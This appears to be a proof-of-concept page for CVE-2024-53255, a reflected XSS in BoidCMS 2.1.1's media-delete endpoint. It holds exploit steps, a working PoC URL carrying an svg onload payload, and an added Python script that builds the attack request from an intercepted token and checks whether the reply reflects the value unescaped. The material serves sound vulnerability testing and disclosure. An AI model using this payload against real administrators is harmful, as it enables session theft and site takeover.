
CVE-2024-53255 PoC — Reflected Cross-site Scripting in /admin?page=media via file Parameter in BoidCMS

Associated Vulnerability
Title: Reflected Cross-site Scripting in /admin?page=media via file Parameter in BoidCMS (CVE-2024-53255)
Description: BoidCMS is a free and open-source flat file CMS for building simple websites and blogs, developed using PHP and uses JSON as a database. In affected versions a reflected Cross-site Scripting (XSS) vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code. This code could be used to steal the user's session cookie, perform phishing attacks, or deface the website. This issue has been addressed in version 2.1.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)
Readme
# CVE-2024-53255
boid CMS 2.1.1 - reflected Cross-Site Scripting (XSS)

# Description:

A reflected XSS vulnerability exists in the /admin?page=media endpoint: the value of the file parameter in a delete request is reflected into the admin response without HTML encoding, so an attacker can inject arbitrary JavaScript that runs in the browser of the logged-in administrator who follows the crafted link. The issue is fixed in BoidCMS 2.1.2.

# Steps to exploit:

1- Log in to the CMS and navigate to the media page (/admin?page=media), where files are deleted.

2- Select any file to delete and intercept the resulting request with a proxy tool. The request carries a `token` parameter; keep it. The token value in the PoC URL below was captured from the author's session, so use the one from your own intercepted request.

3- Modify the file parameter in the intercepted request to the following (the URL-encoded form of `<svg onload=alert(document.domain)>`):

```
<svg+onload%3dalert(document.domain)>
```
4- Forward the modified request; the file name is reflected into the admin page unescaped and the injected script executes.

Proof of concept (PoC):

```
http://localhost/boidcms/admin?page=media&action=delete&file=<svg+onload%3dalert(document.domain)>&token=693b471d9ee886766b69fd0dab9d992cd7f0e1e483822b28b6e8bcde0cf502e4
```
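The following is an added example, not code from the PoC repository or from BoidCMS. It automates the two things the steps above leave to the tester: rebuilding the PoC request from an intercepted legitimate delete request (so the session's own `token` is kept rather than the author's), and deciding whether the `file` value came back unescaped (vulnerable) or HTML-encoded (the behaviour a fixed 2.1.2 install should show). The two response bodies are constructed for the example; the real alert markup in BoidCMS will differ, and only the reflected value matters.

```python
"""Added example for CVE-2024-53255 (not part of the original PoC or of BoidCMS).

Builds the delete request with the attacker-controlled `file` value and
classifies a response body as vulnerable / fixed / not reflected.
Runs offline against constructed sample responses.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Decoded form of the payload used in the PoC (the PoC URL carries it URL-encoded).
PAYLOAD = "<svg onload=alert(document.domain)>"


def build_poc_url(intercepted_url: str, payload: str = PAYLOAD) -> str:
    """Take the legitimate delete request captured in step 2 and swap the
    `file` value for the payload.  Every other parameter, including the
    session's `token`, is preserved so the request is still accepted."""
    parts = urlsplit(intercepted_url)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if "token" not in params:
        # The PoC relies on the token from a real request; refuse to guess one.
        raise ValueError("intercepted request has no token parameter; capture a real delete request")
    params["file"] = payload
    # urlencode applies quote_plus: '<' -> %3C, ' ' -> '+', '=' -> %3D, '(' -> %28
    return f"{parts.scheme}://{parts.netloc}{parts.path}?{urlencode(params)}"


def classify_response(body: str, payload: str = PAYLOAD) -> str:
    """'vulnerable' if the payload is reflected verbatim (executable markup),
    'fixed' if only its HTML-escaped form appears (what htmlspecialchars() yields),
    'not reflected' if neither shows up (e.g. the request was rejected)."""
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=True) in body:
        return "fixed"
    return "not reflected"


# Constructed sample responses (the real BoidCMS alert markup will differ).
VULNERABLE_RESPONSE = f'<div class="alert">File {PAYLOAD} could not be deleted</div>'
FIXED_RESPONSE = f'<div class="alert">File {html.escape(PAYLOAD, quote=True)} could not be deleted</div>'
REJECTED_RESPONSE = '<div class="alert">Invalid token</div>'


if __name__ == "__main__":
    # Hypothetical intercepted request (token value is illustrative).
    captured = "http://localhost/boidcms/admin?page=media&action=delete&file=test.png&token=abc123"
    print(build_poc_url(captured))
    for name, body in [("vulnerable", VULNERABLE_RESPONSE),
                       ("fixed", FIXED_RESPONSE),
                       ("rejected", REJECTED_RESPONSE)]:
        print(f"{name:>10}: {classify_response(body)}")
```

To use it against a live test instance, fetch `build_poc_url(...)` with the tester's own admin session cookie and pass the response body to `classify_response`; a `not reflected` result usually means the request was rejected before the file name was echoed (missing or stale token), not that the install is patched.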

For details:
https://nvd.nist.gov/vuln/detail/CVE-2024-53255
https://www.cve.org/CVERecord?id=CVE-2024-53255
https://github.com/BoidCMS/BoidCMS/commit/42f4d703a87f5199bbd701b3495a26c91b9cfab7
https://github.com/BoidCMS/BoidCMS/security/advisories/GHSA-7q7m-cgw8-px4r
File Snapshot

```
/data/pocs/d606f211b0d25e490e53c8e3256ca268bc638f61
└── README.md

0 directories, 1 file
```